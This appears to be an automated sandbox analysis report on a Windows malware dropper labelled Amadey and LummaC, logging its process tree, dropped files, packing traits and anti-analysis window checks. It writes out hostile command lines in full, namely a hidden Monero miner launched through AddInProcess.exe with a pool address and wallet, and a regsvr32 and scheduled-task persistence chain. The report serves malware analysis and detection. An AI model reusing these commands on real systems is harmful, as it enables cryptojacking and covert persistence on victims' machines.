Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe "C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe"
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Process created: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe "C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe"
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7512 -s 924
Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\JeDkUsy6Fzs0.bat" "
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe"
Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe	Process created: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmp "C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmp" /SL5="$C0210,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe"
Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmp	Process created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT
Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe	Process created: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp "C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp" /SL5="$901FC,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -NoProfile -NonInteractive -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe "C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe "C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe "C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\JeDkUsy6Fzs0.bat" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Process created: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe "C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe"
Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe	Process created: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmp "C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmp" /SL5="$C0210,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe"
Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmp	Process created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT
Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe	Process created: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp "C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp" /SL5="$901FC,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -NoProfile -NonInteractive -Command -
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Unpacked PE file: 0.2.Mc3FDUMnVz.exe.940000.0.unpack :EW;.rsrc:W;.idata :W; :EW;shlcppqz:EW;uglmbbpk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;shlcppqz:EW;uglmbbpk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.120000.0.unpack :EW;.rsrc:W;.idata :W; :EW;shlcppqz:EW;uglmbbpk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;shlcppqz:EW;uglmbbpk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 3.2.skotes.exe.120000.0.unpack :EW;.rsrc:W;.idata :W; :EW;shlcppqz:EW;uglmbbpk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;shlcppqz:EW;uglmbbpk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	Unpacked PE file: 10.2.Fe36XBk.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;apuhhdvg:EW;pzrtjeve:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;apuhhdvg:EW;pzrtjeve:EW;.taggant:EW;

Source: Ryu8yUx[1].exe.7.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: RQsQTTbUYeEtZ5KVMrb(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{RQsQTTbUYeEtZ5KVMrb(typeof(IntPtr).TypeHandle),RQsQTTbUYeEtZ5KVMrb(typeof(Type).TypeHandle)})
Source: Ryu8yUx.exe.7.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: RQsQTTbUYeEtZ5KVMrb(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{RQsQTTbUYeEtZ5KVMrb(typeof(IntPtr).TypeHandle),RQsQTTbUYeEtZ5KVMrb(typeof(Type).TypeHandle)})
Source: 12.2.Ryu8yUx.exe.45b9550.0.raw.unpack, gBMthepoZSL1ZVKpeA.cs	.Net Code: RQsQTTbUYeEtZ5KVMrb(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{RQsQTTbUYeEtZ5KVMrb(typeof(IntPtr).TypeHandle),RQsQTTbUYeEtZ5KVMrb(typeof(Type).TypeHandle)})

Source: Ryu8yUx[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x6a36b
Source: Stamp_Setup.tmp.25.dr	Static PE information: real checksum: 0x0 should be: 0x12974f
Source: _setup64.tmp.26.dr	Static PE information: real checksum: 0x0 should be: 0x8546
Source: Fe36XBk[1].exe.7.dr	Static PE information: real checksum: 0x220621 should be: 0x21e123
Source: Stamp_Setup.tmp.23.dr	Static PE information: real checksum: 0x0 should be: 0x12974f
Source: kUHbhqh.exe.7.dr	Static PE information: real checksum: 0xd40f1 should be: 0xd8e34
Source: kUHbhqh[1].exe.7.dr	Static PE information: real checksum: 0xd40f1 should be: 0xd8e34
Source: Ryu8yUx.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x6a36b
Source: is-6JNF1.tmp.26.dr	Static PE information: real checksum: 0x0 should be: 0x127a25
Source: _isdecmp.dll.24.dr	Static PE information: real checksum: 0x0 should be: 0x5528
Source: _isdecmp.dll.26.dr	Static PE information: real checksum: 0x0 should be: 0x5528
Source: is-DKJ0H.tmp.26.dr	Static PE information: real checksum: 0x12c91c should be: 0x134190
Source: Fe36XBk.exe.7.dr	Static PE information: real checksum: 0x220621 should be: 0x21e123
Source: Stamp_Setup.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x16db80
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x210c5e should be: 0x2169d1
Source: Mc3FDUMnVz.exe	Static PE information: real checksum: 0x210c5e should be: 0x2169d1
Source: _setup64.tmp.24.dr	Static PE information: real checksum: 0x0 should be: 0x8546

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001CAC26 push 1554ABA4h; mov dword ptr [esp], eax	3_1_001CAC34
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001F1670 push edi; mov dword ptr [esp], ebp	3_1_001F1718
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001F1670 push ecx; mov dword ptr [esp], ebx	3_1_001F1770
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001F1670 push ecx; mov dword ptr [esp], 7DA83BF2h	3_1_001F17AE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_0025204A push ecx; mov dword ptr [esp], edi	3_1_0025204E
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_0025204A push edx; mov dword ptr [esp], ebx	3_1_002520BD
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_0025204A push ecx; mov dword ptr [esp], ebp	3_1_002520FF
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001E6C6F push 1BE56D9Dh; mov dword ptr [esp], edx	3_1_001E6CA7
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001E6C6F push esi; mov dword ptr [esp], edx	3_1_001E6D4C
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001E6C6F push 72F001CDh; mov dword ptr [esp], ebx	3_1_001E6D7B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001E6C6F push eax; mov dword ptr [esp], 1B42DAD2h	3_1_001E6D8D
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001CB263 push 5F9C092Eh; mov dword ptr [esp], edx	3_1_001CB27B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_0025C294 push ebx; mov dword ptr [esp], eax	3_1_0025C388
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_0025C294 push 5A592CDFh; mov dword ptr [esp], ebx	3_1_0025C3CD
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001926D0 push edx; retf	3_1_001926D2
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_002700F7 push ecx; mov dword ptr [esp], edx	3_1_0027013C
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_002700F7 push 7D872F38h; mov dword ptr [esp], eax	3_1_002701FF
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_002700F7 push esi; mov dword ptr [esp], ebx	3_1_0027021E
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001BF6FD push ecx; mov dword ptr [esp], edi	3_1_001BF722
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001BF6FD push 6082A69Fh; mov dword ptr [esp], ecx	3_1_001BF75A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001F2D15 push eax; mov dword ptr [esp], edi	3_1_001F2D68
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_0018EF04 push ecx; retf	3_1_0018EF05
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001B7F3B push edx; mov dword ptr [esp], 5FF5C43Ch	3_1_001B7FDB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001B7F3B push ebx; mov dword ptr [esp], 5A1CF3ABh	3_1_001B8111
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_0019874F push 4F732503h; mov dword ptr [esp], ebp	3_1_001987AC
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001FCB8F push edx; mov dword ptr [esp], 37654843h	3_1_001FCBD1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001FCB8F push 0787C9A0h; mov dword ptr [esp], eax	3_1_001FCC21
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001FCB8F push ebp; mov dword ptr [esp], edi	3_1_001FCC77
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001FCB8F push 2DE71F35h; mov dword ptr [esp], edx	3_1_001FCC7F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001FCB8F push 1C28A808h; mov dword ptr [esp], esi	3_1_001FCCAB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_0022C99A push 21A7BAD5h; mov dword ptr [esp], edi	3_1_0022C9AF

Source: Mc3FDUMnVz.exe	Static PE information: section name: entropy: 7.131647028097189
Source: Mc3FDUMnVz.exe	Static PE information: section name: shlcppqz entropy: 7.952810524743205
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.131647028097189
Source: skotes.exe.0.dr	Static PE information: section name: shlcppqz entropy: 7.952810524743205
Source: Fe36XBk[1].exe.7.dr	Static PE information: section name: entropy: 7.936555243798327
Source: Fe36XBk[1].exe.7.dr	Static PE information: section name: apuhhdvg entropy: 7.952252453116048
Source: Fe36XBk.exe.7.dr	Static PE information: section name: entropy: 7.936555243798327
Source: Fe36XBk.exe.7.dr	Static PE information: section name: apuhhdvg entropy: 7.952252453116048

Source: Ryu8yUx[1].exe.7.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'iJ7hGcJiZtrY1vmTXS1', 'l3eRiSJQRS1T675dhDw', 'reTlcDMFua', 'BxhRGVJ7kheGMf3Py2t', 'gg3ZFVJakBdVFuZCIgG', 'G5c3kgJhorWWcabQiWI', 'Gim47mJIx9UyjsEXoD7', 'ItKq8kJ0OyIS0T9lLUQ', 'N6HgC6J6Gp0JEvuuieG', 'g4UifPJHxIeKxNQ4Axj'
Source: Ryu8yUx.exe.7.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'iJ7hGcJiZtrY1vmTXS1', 'l3eRiSJQRS1T675dhDw', 'reTlcDMFua', 'BxhRGVJ7kheGMf3Py2t', 'gg3ZFVJakBdVFuZCIgG', 'G5c3kgJhorWWcabQiWI', 'Gim47mJIx9UyjsEXoD7', 'ItKq8kJ0OyIS0T9lLUQ', 'N6HgC6J6Gp0JEvuuieG', 'g4UifPJHxIeKxNQ4Axj'
Source: 12.2.Ryu8yUx.exe.45b9550.0.raw.unpack, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'iJ7hGcJiZtrY1vmTXS1', 'l3eRiSJQRS1T675dhDw', 'reTlcDMFua', 'BxhRGVJ7kheGMf3Py2t', 'gg3ZFVJakBdVFuZCIgG', 'G5c3kgJhorWWcabQiWI', 'Gim47mJIx9UyjsEXoD7', 'ItKq8kJ0OyIS0T9lLUQ', 'N6HgC6J6Gp0JEvuuieG', 'g4UifPJHxIeKxNQ4Axj'

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\kUHbhqh[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmp	File created: C:\Users\user\AppData\Local\Temp\is-MEEGL.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Ryu8yUx[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp	File created: C:\Users\user\AppData\Local\is-6JNF1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp	File created: C:\Users\user\AppData\Roaming\9mpr_8.ocx (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmp	File created: C:\Users\user\AppData\Local\Temp\is-MEEGL.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Fe36XBk[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe	File created: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp	File created: C:\Users\user\AppData\Roaming\is-DKJ0H.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp	File created: C:\Users\user\AppData\Local\Temp\is-2HFGI.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe	File created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmp	File created: C:\Users\user\AppData\Local\Temp\is-MEEGL.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp	File created: C:\Users\user\AppData\Local\Temp\is-2HFGI.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe	File created: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp	File created: C:\Users\user\AppData\Local\Temp\is-2HFGI.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp	File created: C:\Users\user\AppData\Local\unins000.exe (copy)	Jump to dropped file

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Mc3FDUMnVz.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Bitcoin Miner

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Bitcoin Miner

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Mc3FDUMnVz.exe

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
